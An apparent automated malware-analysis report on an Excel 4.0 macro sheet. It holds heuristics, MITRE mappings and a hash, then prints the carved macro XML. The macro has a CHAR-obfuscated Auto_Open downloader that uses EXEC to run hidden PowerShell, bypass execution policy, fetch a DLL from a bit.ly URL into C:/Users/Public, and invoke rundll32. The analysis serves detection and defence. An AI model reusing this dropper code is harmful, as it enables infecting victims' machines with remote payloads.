MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro sheet containing an Auto_Open defined name, a common technique for executing malicious macros when the document is opened. The macros use dangerous XLM functions such as EXEC and FORMULA to download and execute a payload from the URL https://bit.ly/36yBFdu. This indicates downloader or dropper functionality.
Heuristics 5
- Excel 4.0 macro sheet (1 sheet(s)) | critical | 2 related findings | OOXML_XLM_MACROSHEET: Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
- Excel 4.0 Auto_Open defined name | critical | OOXML_XLM_AUTOOPEN_DEFINEDNAME: Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
- Dangerous XLM formula APIs: GOTO, EXEC, FORMULA | critical | OOXML_XLM_DANGEROUS_FN: Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
- Suspicious extracted artifact | medium | EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main : In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main : In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships : In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 : In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac : In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2014/revision : In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 : In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 : In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 : In document text (OOXML body / shared strings)
  - https://bit.ly/36yBFdu : In document text (OOXML body / shared strings)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 22375 bytes |

SHA-256: 31472c48afd1d9839c192a47dc0c1972d48384e142cca2aa0ee02786a7ecc4ae

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 9 shell/COM execution token(s).
Preview script: first 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{738BC0DD-2038-4C8E-9D4F-E19AF1D8C361}"><dimension ref="A1:W574"/><sheetViews><sheetView showFormulas="1" tabSelected="1" topLeftCell="J450" zoomScaleNormal="100" workbookViewId="0"><selection activeCell="L459" sqref="L459"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15"/><cols><col min="1" max="1" width="32.28515625" style="1" customWidth="1"/><col min="2" max="2" width="34.42578125" style="1" customWidth="1"/><col min="3" max="3" width="9.85546875" style="1" customWidth="1"/><col min="4" max="4" width="10.140625" style="1" customWidth="1"/><col min="5" max="5" width="13.28515625" style="1" customWidth="1"/><col min="6" max="6" width="9.42578125" style="1" customWidth="1"/><col min="7" max="7" width="10.85546875" style="1" customWidth="1"/><col min="8" max="22" width="9.140625" style="1"/><col min="23" max="23" width="12.42578125" style="1" bestFit="1" customWidth="1"/><col min="24" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="1" spans="3:8"><c r="C1" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H1" s="1" 
t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c></row><row r="2" spans="3:8"><c r="C2" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H2" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c></row><row r="3" spans="3:8"><c r="C3" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H3" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="4" spans="3:8"><c r="C4" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H4" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="5" spans="3:8"><c r="C5" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H5" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="6" spans="3:8"><c r="C6" s="1" 
t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H6" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="7" spans="3:8"><c r="C7" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c><c r="D7" s="2"><f>IF(GET.DOCUMENT(88)<>"wrongname.xlsm",V7,C10)</f><v>0</v></c><c r="H7" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="9" spans="3:8"><c r="C9" s="1" t="b"><f>ALERT("Good Job")</f><v>1</v></c></row><row r="10" spans="3:8"><c r="C10" s="1" t="b"><f>GOTO(D9)</f><v>0</v></c></row><row r="11" spans="3:8"><c r="C11" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H11" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(100),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(32),CHAR(99),CHAR(109),CHAR(100),CHAR(32),CHAR(47))</f><v>sdfdsfdsf cmd /</v></c></row><row r="12" spans="3:8"><c r="C12" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H12" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="13" spans="3:8"><c r="C13" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H13" s="1" 
t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="14" spans="3:8"><c r="C14" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H14" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="15" spans="3:8"><c r="C15" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H15" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="16" spans="3:8"><c r="C16" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H16" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="17" spans="3:8"><c r="C17" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c><c r="H17" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="18" spans="3:8"><c r="C18" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H18" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="19" spans="3:8"><c r="C19" s="1" 
t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H19" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(100),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(32),CHAR(99),CHAR(109),CHAR(100),CHAR(32),CHAR(47))</f><v>sdfdsfdsf cmd /</v></c></row><row r="20" spans="3:8"><c r="C20" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H20" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="21" spans="3:8"><c r="C21" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H21" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="22" spans="3:8"><c r="C22" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H22" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="23" spans="3:8"><c r="C23" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H23" s="1" 
t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="24" spans="3:8"><c r="C24" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c><c r="H24" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="25" spans="3:8"><c r="C25" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H25" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="26" spans="3:8"><c r="C26" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H26" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="27" spans="3:8"><c r="C27" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H27" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="28" spans="3:8"><c r="C28" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H28" s="1" 
t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="29" spans="3:8"><c r="C29" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H29" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="30" spans="3:8"><c r="C30" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H30" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="31" spans="3:8"><c r="C31" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="32" spans="3:8"><c r="C32" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="33" spans="1:3"><c r="C33" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c></row><row r="34" spans="1:3"><c r="C34" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c></row><row r="35" spans="1:3"><c r="C35" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row 
r="36" spans="1:3"><c r="C36" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="37" spans="1:3"><c r="C37" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="38" spans="1:3"><c r="C38" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="39" spans="1:3"><c r="A39" s="1" t="b"><f>GOTO(B3)</f><v>1</v></c><c r="C39" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="40" spans="1:3"><c r="C40" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c></row><row r="41" spans="1:3"><c r="C41" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c></row><row r="42" spans="1:3"><c r="C42" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="43" spans="1:3"><c r="C43" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="44" spans="1:3"><c r="C44" s="1" 
t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="45" spans="1:3"><c r="C45" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="99" spans="1:5"><c r="B99" s="2" t="b"><f>IF(GET.DOCUMENT(88)<>"wrongname.xlsm",GOTO(A108),GOTO(E102))</f><v>1</v></c></row><row r="102" spans="1:5"><c r="E102" s="1" t="b"><f>ALERT("Good Job")</f><v>1</v></c></row><row r="103" spans="1:5"><c r="E103" s="3"/></row><row r="108" spans="1:5"><c r="A108" s="1" t="b"><f>CLOSE(TRUE)</f><v>0</v></c></row><row r="111" spans="1:5"><c r="E111" s="1" t="b"><f>GOTO(D107)</f><v>1</v></c></row><row r="117" spans="4:7"><c r="D117" s="4" t="str"><f>CONCATENATE(MID("=",1,1),MID("E",1,1),MID("X",1,1),MID("E",1,1),MID("C",1,1),MID("(",1,1),CHAR(34))</f><v>=EXEC("</v></c><c r="G117" s="4" t="str"><f>CONCATENATE(MID("=",1,1),MID("E",1,1),MID("X",1,1),MID("E",1,1),MID("C",1,1),MID("(",1,1),CHAR(34))</f><v>=EXEC("</v></c></row><row r="118" spans="4:7"><c r="D118" s="4" t="str"><f>CONCATENATE(CHAR(34),MID(")",1,1))</f><v>")</v></c><c r="G118" s="4" t="str"><f>CONCATENATE(CHAR(34),MID(")",1,1))</f><v>")</v></c></row><row r="119" spans="4:7"><c r="D119" s="4" t="str"><f>CONCATENATE(D117,E152,D118)</f><v>=EXEC("Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Microsoft.dll")</v></c><c r="G119" s="4" t="str"><f>CONCATENATE(G117,H152,G118)</f><v>=EXEC("Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Microsoft.dll")</v></c></row><row r="120" spans="4:7"><c r="D120" s="4" t="b"><f>FORMULA(D119,D305)</f><v>1</v></c><c r="G120" s="4" t="b"><f>FORMULA(G119,G305)</f><v>1</v></c></row><row r="131" spans="5:5"><c r="E131" s="1" 
t="str"><f>CONCATENATE(CHAR(100),CHAR(111),CHAR(119),CHAR(115),CHAR(116),CHAR(121),CHAR(108),CHAR(101),CHAR(32),CHAR(104),CHAR(105),CHAR(100),CHAR(100),CHAR(101))</f><v>dowstyle hidde</v></c></row><row r="132" spans="5:5"><c r="E132" s="1" t="str"><f>CONCATENATE(CHAR(80),CHAR(111),CHAR(119),CHAR(101),CHAR(114),CHAR(115),CHAR(104),CHAR(101),CHAR(108),CHAR(108),CHAR(32),CHAR(45),CHAR(119),CHAR(105),CHAR(110))</f><v>Powershell -win</v></c></row><row r="134" spans="5:5"><c r="E134" s="1" t="str"><f>CONCATENATE(CHAR(110),CHAR(32),CHAR(45),CHAR(69),CHAR(120),CHAR(101),CHAR(99),CHAR(117),CHAR(116),CHAR(105),CHAR(111),CHAR(110),CHAR(80),CHAR(111))</f><v>n -ExecutionPo</v></c></row><row r="135" spans="5:5"><c r="E135" s="1" t="str"><f>CONCATENATE(CHAR(108),CHAR(105),CHAR(99),CHAR(121),CHAR(32),CHAR(66),CHAR(121),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(32),CHAR(119),CHAR(103))</f><v>licy Bypass wg</v></c></row><row r="136" spans="5:5"><c r="E136" s="1" t="str"><f>CONCATENATE(CHAR(101),CHAR(116),CHAR(32),CHAR(104),CHAR(116),CHAR(116),CHAR(112),CHAR(115),CHAR(58),CHAR(47),CHAR(47),CHAR(98),CHAR(105),CHAR(116))</f><v>et https://bit</v></c></row><row r="137" spans="5:5"><c r="E137" s="1" t="str"><f>CONCATENATE(CHAR(46),CHAR(108),CHAR(121),CHAR(47),CHAR(51),CHAR(54),CHAR(121),CHAR(66),CHAR(70),CHAR(100),CHAR(117),CHAR(32),CHAR(45),CHAR(79))</f><v>.ly/36yBFdu -O</v></c></row><row r="138" spans="5:5"><c r="E138" s="1" t="str"><f>CONCATENATE(CHAR(117),CHAR(116),CHAR(70),CHAR(105),CHAR(108),CHAR(101),CHAR(32),CHAR(67),CHAR(58),CHAR(47),CHAR(85),CHAR(115),CHAR(101),CHAR(114))</f><v>utFile C:/User</v></c></row><row r="139" spans="5:5"><c r="E139" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(47),CHAR(80),CHAR(117),CHAR(98),CHAR(108),CHAR(105),CHAR(99),CHAR(47),CHAR(77),CHAR(105),CHAR(99),CHAR(114),CHAR(111))</f><v>s/Public/Micro</v></c></row><row r="140" spans="5:5"><c r="E140" s="1" 
t="str"><f>CONCATENATE(CHAR(115),CHAR(111),CHAR(102),CHAR(116),CHAR(46),CHAR(100),CHAR(108),CHAR(108))</f><v>soft.dll</v></c></row><row r="147" spans="5:5"><c r="E147" s="1" t="str"><f>CONCATENATE(E132,E131)</f><v>Powershell -windowstyle hidde</v></c></row><row r="148" spans="5:5"><c r="E148" s="1" t="str"><f>CONCATENATE(E134,E135)</f><v>n -ExecutionPolicy Bypass wg</v></c></row><row r="149" spans="5:5"><c r="E149" s="1" t="str"><f>CONCATENATE(E136,E137)</f><v>et https://bit.ly/36yBFdu -O</v></c></row><row r="150" spans="5:5"><c r="E150" s="1" t="str"><f>CONCATENATE(E138,E139)</f><v>utFile C:/Users/Public/Micro</v></c></row><row r="151" spans="5:5"><c r="E151" s="1" t="str"><f>CONCATENATE(E147,E148,E149,E150)</f><v>Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Micro</v></c></row><row r="152" spans="5:5"><c r="E152" s="1" t="str"><f>CONCATENATE(E151,E140)</f><v>Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Microsoft.dll</v></c></row><row r="305" spans="4:4"><c r="D305" s="1" t="s"><v>0</v></c></row><row r="315" spans="4:4"><c r="D315" s="1" t="b"><f>FORMULA("Finished",D305)</f><v>1</v></c></row><row r="474" spans="23:23"><c r="W474" s="1" t="str"><f>CONCATENATE(CHAR(114),CHAR(117),CHAR(110),CHAR(100),CHAR(108),CHAR(108),CHAR(51),CHAR(50),CHAR(46),CHAR(101),CHAR(120),CHAR(101),CHAR(32),CHAR(67),CHAR(58))</f><v>rundll32.exe C:</v></c></row><row r="475" spans="23:23"><c r="W475" s="1" 